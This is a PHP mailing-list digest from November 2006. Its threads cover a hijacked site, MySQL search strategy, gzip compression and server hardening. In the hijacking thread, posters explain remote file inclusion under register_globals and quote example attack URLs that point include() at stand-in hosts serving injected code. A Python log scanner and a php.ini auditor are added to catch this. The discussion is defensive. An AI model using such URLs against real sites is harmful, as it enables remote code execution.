php-general Digest 14 Nov 2006 06:16:51 -0000 Issue 4458

Topics (messages 244561 through 244583):

Re: Highjack?
        244561 by: Matt Carlson
        244562 by: Rory Browne
        244563 by: bruce

Re: How do you do the ? mark after a filename
        244564 by: Norbert Ehart

Scrolling text
        244565 by: Alain Roger
        244566 by: Robert Cummings

Re: one click - two actions?
        244567 by: Mel
        244569 by: Warren Vail
        244571 by: Mel
        244577 by: Warren Vail

Problem with PHP 5.2.0
        244568 by: bluefx13.gmail.com
        244580 by: Kevin Waterson

Re: Mysql strategy
        244570 by: David Tulloh
        244572 by: Robert Cummings
        244578 by: Chris
        244579 by: Larry Garfield

Compressing both php and linked css files with ob_gzhandler and htaccess
        244573 by: Graham Anderson
        244574 by: Jochem Maas
        244575 by: Graham Anderson
        244576 by: Graham Anderson

Re: server side security
        244581 by: Chris
        244582 by: Ligaya A. Turmelle

Re: problem with php[4,5] (horde 2/3)
        244583 by: Chris

Administrivia:

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        php-general@lists.php.net


----------------------------------------------------------------------
--- Begin Message ---
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) 
are automatically populated into variables.  With that in mind    
www.example.com/index.php?path=remoteexplot.com/ would then yield 
include('remoteexplit.com/foo');  thus including ANY code they wish.

----- Original Message ----
From: bruce <[EMAIL PROTECTED]>
To: Eric Butera <[EMAIL PROTECTED]>; tedd <[EMAIL PROTECTED]>
Cc: PHP General List <php-general@lists.php.net>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?

eric...

you say how embarrassing regarding the $path.'foo'.... i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?


On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com  http://ancientstones.com  http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--- End Message ---
--- Begin Message ---
---------- Forwarded message ----------
From: Rory Browne <[EMAIL PROTECTED]>
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]



On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:
>
> eric...
>
> you say how embarrassing regarding the $path.'foo'.... i'm curious, why/how is
> this simple piece of code exploitable. assuming $path is not something that
> comes via the url vars (GET/POST/REQUEST)


If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=


The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php


> it shouldn't be able to be touched
> by external/client processes... similarly, the 'foo' would be static, and
> couldn't be munged...
>
> thoughts/explanations...
>
> thanks



-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?


On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com   http://ancientstones.com  http://earthstones.com

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--- End Message ---
--- Begin Message ---
rory..

thanks.. i had meant to say assuming globals is off...

-----Original Message-----
From: Rory Browne [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 10:12 AM
To: PHP
Subject: Fwd: [PHP] Highjack?


---------- Forwarded message ----------
From: Rory Browne <[EMAIL PROTECTED]>
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]



On 11/13/06, bruce <[EMAIL PROTECTED]> wrote:
>
> eric...
>
> you say how embarrassing regarding the $path.'foo'.... i'm curious, why/how is
> this simple piece of code exploitable. assuming $path is not something that
> comes via the url vars (GET/POST/REQUEST)


If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=


The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php


> it shouldn't be able to be touched
> by external/client processes... similarly, the 'foo' would be static, and
> couldn't be munged...
>
> thoughts/explanations...
>
> thanks
>
>
>
> -----Original Message-----
> From: Eric Butera [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 9:39 AM
> To: tedd
> Cc: PHP General List
> Subject: Re: [PHP] Highjack?
>
>
> On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
> > Hi gang:
> >
> > While this is not an obvious php question, it does deal with security
> > which is a concern.
> >
> > Just this morning had a couple of my sites "highjacked". What I found
> > was someone had replaced my root level index.php with their own
> > index.php. You can see the result at:
> >
> > http://xn--u2g.com/index1.php
> >
> > It was not a terrible loss nor inconvenience, but I wonder how they
> > did it. Any ideas how this was done and suggestions as to how to
> > prevent this from happening again?
> >
> > Thanks,
> >
> > tedd
> >
> > --
> > -------
> > http://sperling.com   http://ancientstones.com  http://earthstones.com
>
> Tedd,
>
> I've seen this happen before when someone was able to do a remote code
> execution exploit on an old version of a very popular open source
> shopping cart project.  I'd say the first thing would be to try and
> find any include/require statements that are exploitable.  In the case
> I was dealing with, it was a problem with register_globals on and an
> include that looked a bit like this include($path .'script.php');.
> How embarrassing.
>
> If you have access to your server logs look for urls such as
> http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--- End Message ---
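
The log check suggested in the thread above, as an added example that is not part of any poster's message: the Python below scans Apache-style access-log lines for query parameters whose value is itself a URL, including the percent-encoded form. The log lines and client addresses are constructed; the script and host names are the placeholders used in the thread.

```python
import re
from collections import namedtuple
from urllib.parse import parse_qsl

# Client address, request line and status from an Apache common/combined log line.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A parameter value that begins with a URL scheme, which is what the thread
# says to look for: ?action=http://evil.example.com/inject.txt
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

Hit = namedtuple("Hit", "lineno client script param value status")

# Constructed sample input (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2006:09:12:01 -0500] "GET /index.php?x=search HTTP/1.1" 200 5120',
    '203.0.113.7 - - [13/Nov/2006:09:14:37 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 312',
    '203.0.113.7 - - [13/Nov/2006:09:14:52 -0500] "GET /badscript.php?path=http%3A%2F%2Fwww.badserver.com%2Fbadscript.txt%3Fdummy%3D HTTP/1.1" 200 298',
    '198.51.100.23 - - [13/Nov/2006:09:20:05 -0500] "GET /single_page.php?art=crp_logo.jpg HTTP/1.1" 200 8841',
    '192.0.2.10 - - [13/Nov/2006:09:21:44 -0500] "GET /go.php?next=/help/http://faq HTTP/1.1" 404 210',
]


def find_remote_include_attempts(lines):
    """Return a Hit for every query parameter whose value starts with a URL scheme."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not a request line this pattern understands
        script, _, query = match.group("target").partition("?")
        # parse_qsl percent-decodes, so path=http%3A%2F%2F... is caught too.
        for param, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                hits.append(Hit(lineno, match.group("client"), script,
                                param, value, int(match.group("status"))))
    return hits


def scripts_to_review(hits):
    """Group hits by script so the include/require calls in each can be inspected."""
    by_script = {}
    for hit in hits:
        by_script.setdefault(hit.script, set()).add(hit.param)
    return by_script


if __name__ == "__main__":
    found = find_remote_include_attempts(SAMPLE_LOG)
    for hit in found:
        # A hit is a lead to follow up, not proof: a 200 only means the script
        # answered, and legitimate parameters (return URLs) can match as well.
        print(f"line {hit.lineno}: {hit.client} {hit.script} "
              f"{hit.param}={hit.value} -> {hit.status}")
    print(scripts_to_review(found))
```

Each script the scan names is a place to look for an include or require built from a request variable.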
--- Begin Message ---
Thomas Bonham wrote:
> I keep seeing the ? mark after many file names index.php?id=234.
>
> So what I would like to know is how do you make them. I have heard that they can make a programs life simpler when doing some things with a database.

in my scripts, i do it with the switch-syntax

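=== snip ===
<?php
// Map the ?x= value to a fixed set of files; the request never supplies a path.
$x = isset($_GET['x']) ? $_GET['x'] : '';
switch ($x)
{
        case "show": include("show.php"); break;
        case "search": include("search.php"); break;
        case "new": include("add_entry.html"); break;
        default: include("show.php"); break;
}
?>
=== snip ===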

now you can enter http://www.domain.at/index.php?x=search; or x=show;





cu,
 norbert.

--- End Message ---
--- Begin Message ---
Hi,

I would like to have a scrolling text (as banner) on our website.
I tried Marquee which work very well but since i use a table and allocate
100% to marquee, if the content of a row (<tr> content) is greater than 100%
or the <table> width, internet explorer automatically write the message on
several lines (not several <tr>).

e.g :

sentence to display : "this is a very long sentence about the way how works
internet explorer with marquee"

way how is it displays under IE :
"this is a very long sentence about the way
how works internet explorer with marquee"

under opera and firefox, it's well displayed as "this is a very long
sentence about the way how works internet explorer with marquee"

so, i would like to know if there is another way how to do a scrolling text
without using flash, shockwave or other tool...only in php or HTML (in worse
case).

thanks a lot,
--
Alain
------------------------------------
Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5

--- End Message ---
--- Begin Message ---
On Mon, 2006-11-13 at 20:22 +0100, Alain Roger wrote:
> Hi,
> 
> I would like to have a scrolling text (as banner) on our website.
> I tried Marquee which work very well but since i use a table and allocate
> 100% to marquee, if the content of a row (<tr> content) is greater than 100%
> or the <table> width, internet explorer automatically write the message on
> several lines (not several <tr>).
> 
> e.g :
> 
> sentence to display : "this is a very long sentence about the way how works
> internet explorer with marquee"
> 
> way how is it displays under IE :
> "this is a very long sentence about the way
>  how works internet explorer with marquee"
> 
> under opera and firefox, it's well displayed as "this is a very long
> sentence about the way how works internet explorer with marquee"
> 
> so, i would like to know if there is another way how to do a scrolling text
> without using flash, shockwave or other tool...only in php or HTML (in worse
> case).
> 
> thanks a lot,

This works really well without the annoyance:

<div style="overflow: scroll; white-space: nowrap;">
this is a very long sentence about the way how works internet explorer
with marquee
</div>

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'

--- End Message ---
--- Begin Message ---
I really don't know?

My site is all php and ready to go live except for this little problem.

I would really appreciate some help.

On Nov 13, 2006, at 4:12 AM, John Meyer wrote:

Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?


--- End Message ---
--- Begin Message ---
Mel, that may have been a disguised hint.  Your answer lies in
javascript.  The first php page needs to contain javascript to open a
second page with the URL to the second php script when the first page
loads.

Keep a couple of things in mind, popup blockers will wreak havoc if you
can't get visitors to your site to stop blocking popups and if you
expect both URLs to receive form contents, you will have to make
arrangements for that in the javascript in your first page, since it
will need to pass the data again.

Check out http://www.hotscripts.com for some links to sites with the
necessary javascript.

Hope this helps,

Warren Vail

-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED] 
Sent: Monday, November 13, 2006 12:32 PM
To: John Meyer
Cc: PHP General List
Subject: Re: [PHP] one click - two actions?

I really don't know?

My site is all php and ready to go live except for this little problem.

I would really appreciate some help.

On Nov 13, 2006, at 4:12 AM, John Meyer wrote:

> Not to be rude or anything, but if you want to do two things with one
> click, wouldn't the javascript list be the place you would want to go?

--- End Message ---
--- Begin Message ---
Thank you for your reply. I think my question is really much more simple than what you are suggesting.
If you have a quick look at
http://www.squareinch.net/single_page.php?art=crp_logo.jpg
you will see what I mean.
I have a single page and both results load in the same page.

When I click on a link the picture loads on the left side and the info should load on the right side. Right now the info is visible at all times regardless of what I click on!
I need to know how to join my echo statements and/or my query!

On Nov 13, 2006, at 12:57 PM, Warren Vail wrote:


Mel, that may have been a disguised hint.  Your answer lies in
javascript.  The first php page needs to contain javascript to open a
second page with the URL to the second php script when the first page
loads.

Keep a couple of things in mind, popup blockers will wreak havoc if you
can't get visitors to your site to stop blocking popups and if you
expect both URLs to receive form contents, you will have to make
arrangements for that in the javascript in your first page, since it
will need to pass the data again.

Check out http://www.hotscripts.com for some links to sites with the
necessary javascript.

Hope this helps,

Warren Vail

-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 12:32 PM
To: John Meyer
Cc: PHP General List
Subject: Re: [PHP] one click - two actions?

I really don't know?

My site is all php and ready to go live except for this little problem.

I would really appreciate some help.

On Nov 13, 2006, at 4:12 AM, John Meyer wrote:

Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?



--- End Message ---
--- Begin Message ---
Mel,

Not sure if I understand your question now or not, but here goes.  In
order to prepare your page you want to be able to click a link on the
left and have the page on the right replaced with something in response.

Technically when php prepares the page, it prepares both sides (unless
you are using frames).  If preparing each side requires different
queries against your database, you can certainly do two database queries
in the same execution.  When you first posed your question you talked
about starting two pages at once.  What I see is one page.  Perhaps if
you used frames you could cause the left frame to be a separate PHP
script and the one on the right another, this would allow your server to
process both requests simultaneously, perhaps this is what you meant?
Technically they are still part of the one page, but each would be a
separate frame within the page.

Caution about using technical terms, in your first message you referred
to separate pages when (I believe) you may have been referring to one
page (yes, page is a technical term) and in your second message you used
a term "Join" which has a meaning when running queries on your database,
causing me to think for a moment that your question had been about
retrieving information from your database, which you seemed to mention.

If you opt to use frames and are new to PHP programming, or programming
with frames, expect difficulties (use of Target consistently is the
key).  I avoid frames unless I simply can't do what I want to do without
the use of them.  I think at one time some browsers didn't support
frames, not sure any more.

Warren Vail

-----Original Message-----
From: Mel [mailto:[EMAIL PROTECTED] 
Sent: Monday, November 13, 2006 1:32 PM
To: Warren Vail
Cc: 'John Meyer'; 'PHP General List'
Subject: Re: [PHP] one click - two actions?

Thank you for your reply. I think my question is really much more  
simple than what you are suggesting.
If you have a quick look at
http://www.squareinch.net/single_page.php?art=crp_logo.jpg
you will see what I mean.
I have a single page and both results load in the same page.

When I click on a link the picture loads on the left side and the  
info should load on the right side.
Right now the info is visible at all times regardless of what I click  
on!
I need to know how to join my echo statements and/or my query!

On Nov 13, 2006, at 12:57 PM, Warren Vail wrote:

>
> Mel, that may have been a disguised hint.  Your answer lies in
> javascript.  The first php page needs to contain javascript to open a
> second page with the URL to the second php script when the first page
> loads.
>
> Keep a couple of things in mind, popup blockers will wreak havoc if you
> can't get visitors to your site to stop blocking popups and if you
> expect both URLs to receive form contents, you will have to make
> arrangements for that in the javascript in your first page, since it
> will need to pass the data again.
>
> Check out http://www.hotscripts.com for some links to sites with the
> necessary javascript.
>
> Hope this helps,
>
> Warren Vail
>
> -----Original Message-----
> From: Mel [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 12:32 PM
> To: John Meyer
> Cc: PHP General List
> Subject: Re: [PHP] one click - two actions?
>
> I really don't know?
>
> My site is all php and ready to go live except for this little  
> problem.
>
> I would really appreciate some help.
>
> On Nov 13, 2006, at 4:12 AM, John Meyer wrote:
>
>> Not to be rude or anything, but if you want to do two things with one
>> click, wouldn't the javascript list be the place you would want to  
>> go?
>
>

--- End Message ---
--- Begin Message ---
Hi. I just installed PHP 5.2.0 and I'm running into some strange problems.

I have a rather large program which uses sockets, pcntl, posix, pdo
(mysql), and is fully object oriented. The program is rather large and
is about 75,000 lines of code.

When I run the application with PHP 5.1.6, I can execute commands in
around 0.6 to 0.8 seconds, uses less than 1% cpu power, and takes around
14 megs of ram.

I installed PHP 5.2.0 and when I execute a command (through my
application), it takes 9 to 12 seconds to complete, it uses 100% cpu
power, and eats about 180 megs of ram.

Nothing changed other than installing PHP 5.2.0. I have reinstalled
5.1.6 and everything is back to normal. I have compiled both versions
the exact same way with the same command line options.

Are there any outstanding issues with PHP 5.2.0? Anyone have any similar
problems?

I don't want to go through my source code to find where 5.2.0 is hanging
so I'm hoping there is a known issue already documented out there.

Here is config line:

./configure --prefix=/usr/local/php5 --libdir=/usr/local/php
--with-config-file-path=/usr/local/php --with-zlib --with-mcrypt
--enable-cli --without-pear --enable-libgcc --with-curl --enable-sockets
--enable-pcntl --enable-posix --enable-sigchild --disable-cgi
--with-pdo-mysql --with-imap-ssl=/usr/local/imap-2006c1 --with-openssl
--enable-ftp


Any help would be appreciated.

Thanks,
John W.

--- End Message ---
--- Begin Message ---
This one time, at band camp, "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:

> Hi. I just installed PHP 5.2.0 and I'm running into some strange problems.

xdebug

Kevin

-- 
"Democracy is two wolves and a lamb voting on what to have for lunch. 
Liberty is a well-armed lamb contesting the vote."

--- End Message ---
--- Begin Message ---
Dotan Cohen wrote:
If I have to perform 30 LIKE searches for different keywords in a
varchar field, which strategy would be recommended:
1) 30 searches, one for each keyword
2) To select the varchar field from all the rows, and search through
them with php's array functions?

It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster.

If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no joins involved. In this case the query will scale linearly with your database size so you shouldn't worry too much about it slowing down over time.


David

--- End Message ---
--- Begin Message ---
On Tue, 2006-11-14 at 00:51 +1100, David Tulloh wrote:
> Dotan Cohen wrote:
> > If I have to perform 30 LIKE searches for different keywords in a
> > varchar field, which strategy would be recommended:
> > 1) 30 searches, one for each keyword
> > 2) To select the varchar field from all the rows, and search through
> > them with php's array functions?
> 
> It's not going to make a great deal of difference if you do the 
> processing in the MySQL or the PHP, in this case it's basically the same 
> operation in each.  I suspect that efficiently recreating the LIKE 
> functionality in PHP wouldn't be trivial to do, if you are just doing 
> straight comparisons the MySQL STRCMP function should be faster.
> 
> If you are worried about the speed of this query I'd suggest rethinking 
> your database structure.  Text field comparisons will always be 
> relatively slow compared to numeric comparisons or numeric lookups.  My 
> reading of this query however is that it should be 30 OR comparisons, no

Except that most search engines refine the search when you add more
keywords in contrast to your suggestion of expanding the search :)

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'

--- End Message ---
--- Begin Message ---
David Tulloh wrote:
Dotan Cohen wrote:
If I have to perform 30 LIKE searches for different keywords in a
varchar field, which strategy would be recommended:
1) 30 searches, one for each keyword
2) To select the varchar field from all the rows, and search through
them with php's array functions?

It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster.

I'd say there will be a big difference. Pulling in 10,000 entries from the database and then sorting them in php will take a lot of memory (and database time to retrieve all of the entries). Getting the database to restrict that number of entries will take a little time but it doesn't have to return all entries, your php memory won't blow out and it won't have bugs in it.

--
Postgresql & php tutorials
http://www.designmagick.com/

--- End Message ---
--- Begin Message ---
On Monday 13 November 2006 17:51, Chris wrote:

> > It's not going to make a great deal of difference if you do the
> > processing in the MySQL or the PHP, in this case it's basically the same
> > operation in each.  I suspect that efficiently recreating the LIKE
> > functionality in PHP wouldn't be trivial to do, if you are just doing
> > straight comparisons the MySQL STRCMP function should be faster.
>
> I'd say there will be a big difference. Pulling in 10,000 entries from
> the database and then sorting them in php will take a lot of memory (and
> database time to retrieve all of the entries). Getting the database to
> restrict that number of entries will take a little time but it doesn't
> have to return all entries, your php memory won't blow out and it won't
> have bugs in it.

As a general rule, I try to push as much logic into the query as I can for the 
simple reason that MySQL is optimized C and my PHP code gets interpreted.  
The odds of me writing something in PHP that's faster than MySQL AB's C code 
are slim. :-)  The exception is grouping, which I've often had to do in PHP 
with a loop to rebuild a result array.  The performance hit for that is not 
that big, however, and if you free() the result set afterward then the memory 
usage is not a major issue either.

If you're finding your query is slow, look into your indexes.  Just today I 
cut a single query from 230 seconds to 21 seconds just by adding two 
indexes. :-)

-- 
Larry Garfield                  AIM: LOLG42
[EMAIL PROTECTED]               ICQ: 6817012

"If nature has made any one thing less susceptible than all others of 
exclusive property, it is the action of the thinking power called an idea, 
which an individual may exclusively possess as long as he keeps it to 
himself; but the moment it is divulged, it forces itself into the possession 
of every one, and the receiver cannot dispossess himself of it."  -- Thomas 
Jefferson

--- End Message ---
--- Begin Message ---
Can I compress a php file AND its referenced css files at the same time ?

Currently, I am using ob_gzhandler to compress my php files only . Works great:)


As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz,

These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On

gzip-css.php
<?php
// Prepended to every .css request: gzip the output and set caching headers.
ob_start("ob_gzhandler");
header("Content-type: text/css; charset=UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60; // cache lifetime in seconds (one hour)
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>

many thanks as I am learning the ins and outs of htaccess and ob_gzhandler
--- End Message ---
--- Begin Message ---
Graham Anderson wrote:
> Can I compress a php file AND its  referenced css files at the same time ?
> 
> Currently, I am using ob_gzhandler to compress my php files only . 
> Works great:)
> 
> 
> As I have found that you CAN NOT use ob_gz and zlib at the same time,
> how do I amend the htaccess file to use ob_gz,

er ...

> 
> These files are in my CSS folder along with style.css.
> .
> .htaccess
> AddHandler application/x-httpd-php .css
> php_value auto_prepend_file gzip-css.php
> php_flag zlib.output_compression On

php_flag zlib.output_compression Off

> 

no?

> gzip-css.php
> <?php
> ob_start ("ob_gzhandler");
> header("Content-type: text/css; charset: UTF-8");
> header("Cache-Control: must-revalidate");
> $offset = 60 * 60 ;
> $ExpStr = "Expires: " .
> gmdate("D, d M Y H:i:s",
> time() + $offset) . " GMT";
> header($ExpStr);
> ?>
> 
> many thanks as I am learning the ins and outs of htaccess and ob_gzhandler

--- End Message ---
--- Begin Message ---
yes :)

I DID try that

strangely, turning it off  disables/kills the css file

g


On Nov 13, 2006, at 2:08 PM, Jochem Maas wrote:

Graham Anderson wrote:
Can I compress a php file AND its referenced css files at the same time ?

Currently, I am using ob_gzhandler to compress my php files only .
Works great:)


As I have found that you CAN NOT use ob_gz and zlib at the same time,
how do I amend the htaccess file to use ob_gz,

er ...


These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On

php_flag zlib.output_compression Off



no?

gzip-css.php
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>

many thanks as I am learning the ins and outs of htaccess and ob_gzhandler

--- End Message ---
--- Begin Message ---
Unfortunately, I am on a shared server for this project :(
Is there some way to enable mod_deflate without admin  server privs?

many thanks

On Nov 13, 2006, at 1:59 PM, steve wrote:

Why use php to compress at all? Use mod_deflate.

On 11/13/06, Graham Anderson <[EMAIL PROTECTED]> wrote:
Can I compress a php file AND its  referenced css files at the same
time ?

Currently, I am using ob_gzhandler to compress my php files only .
Works great:)


As I have found that you CAN NOT use ob_gz and zlib at the same time,
how do I amend the htaccess file to use ob_gz,

These files are in my CSS folder along with style.css.
.
.htaccess
AddHandler application/x-httpd-php .css
php_value auto_prepend_file gzip-css.php
php_flag zlib.output_compression On

gzip-css.php
<?php
ob_start ("ob_gzhandler");
header("Content-type: text/css; charset: UTF-8");
header("Cache-Control: must-revalidate");
$offset = 60 * 60 ;
$ExpStr = "Expires: " .
gmdate("D, d M Y H:i:s",
time() + $offset) . " GMT";
header($ExpStr);
?>

many thanks as I am learning the ins and outs of htaccess and
ob_gzhandler

--- End Message ---
--- Begin Message ---
H. Dan Phillips wrote:
Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo. I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people. Any and all suggestions will be greatly appreciated.

We can't offer advice on the OS or mysql - find a more specific mailing list for those questions.

For the php.ini, disable allow_url_fopen (or if you're using php 5.2.0, disable allow_url_include at least) and disable register_globals.

Depending on what the application does, I'd look at disabling exec, system and the like (see http://php.net/exec & look for "disable_functions" in the php.ini file).

Turn off enable_dl unless you have a specific need for it.

Only enable the extensions you need to use (ie don't enable oracle support if you aren't going to use it).


Having said that - most of the php security problems relate to the application, rather than the php.ini file.

--
Postgresql & php tutorials
http://www.designmagick.com/

--- End Message ---
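
One way to check a php.ini against the settings listed in the message above, as an added example that is not part of the thread: the Python below parses php.ini text and reports each of those settings that is not explicitly in the recommended state. The two sample files, the needed_extensions argument and the php_52_or_later switch are assumptions made for the example; the directive names are the ones the message names.

```python
# Constructed sample php.ini files (not from any real server).
WEAK_INI = """
[PHP]
register_globals = On      ; constructed weak value
allow_url_fopen = On
allow_url_include = On
enable_dl = On
disable_functions =
extension=php_mysql.dll
extension=php_oci8.dll
"""

HARDENED_INI = """
[PHP]
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
enable_dl = Off
disable_functions = exec,system
extension=php_mysql.dll
"""

ON_VALUES = {"1", "on", "true", "yes"}  # strings PHP treats as boolean true


def parse_php_ini(text):
    """Return (directives, extensions); for a repeated directive the last value wins."""
    directives, extensions = {}, []
    for raw in text.splitlines():
        # Simplification: every ';' starts a comment, so a quoted value
        # containing ';' would be cut short.
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip("\"'")
        if key.lower() == "extension":
            extensions.append(value)
        else:
            directives[key.lower()] = value
    return directives, extensions


def audit_php_ini(text, needed_extensions, risky_functions=("exec", "system"),
                  php_52_or_later=True):
    """Return (directive, message) pairs for settings that differ from the advice."""
    directives, extensions = parse_php_ini(text)
    findings = []

    def is_on(key):
        return directives.get(key, "").lower() in ON_VALUES

    def explicitly_off(key):
        return key in directives and not is_on(key)

    for key in ("register_globals", "enable_dl"):
        if not explicitly_off(key):
            state = "On" if is_on(key) else "not set"
            findings.append((key, f"{key} is {state}; set it to Off"))

    # Either allow_url_fopen is off, or (PHP 5.2.0 and later only)
    # allow_url_include is off "at least".
    fopen_off = explicitly_off("allow_url_fopen")
    include_off = php_52_or_later and explicitly_off("allow_url_include")
    if not (fopen_off or include_off):
        findings.append(("allow_url_fopen",
                         "remote URLs can reach include(); turn off "
                         "allow_url_fopen or, on 5.2.0+, allow_url_include"))

    disabled = {name.strip().lower()
                for name in directives.get("disable_functions", "").split(",")}
    missing = [name for name in risky_functions if name not in disabled]
    if missing:
        findings.append(("disable_functions",
                         "consider disabling: " + ", ".join(missing)))

    allowed = {name.lower() for name in needed_extensions}
    extra = [name for name in extensions if name.lower() not in allowed]
    if extra:
        findings.append(("extension",
                         "enabled but not listed as needed: " + ", ".join(extra)))
    return findings


if __name__ == "__main__":
    for directive, message in audit_php_ini(WEAK_INI, {"php_mysql.dll"}):
        print(f"{directive}: {message}")
```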
--- Begin Message ---
<assuming this is possible - not a sys admin - so can be way out of my
league>
Have you thought not having it available on the open web?  Put it behind
a firewall and make it so only local ips on the LAN can access it with
strong passwords.  MySQL - make sure you change the default root user
password to something "hard" - and create only users with the minimum
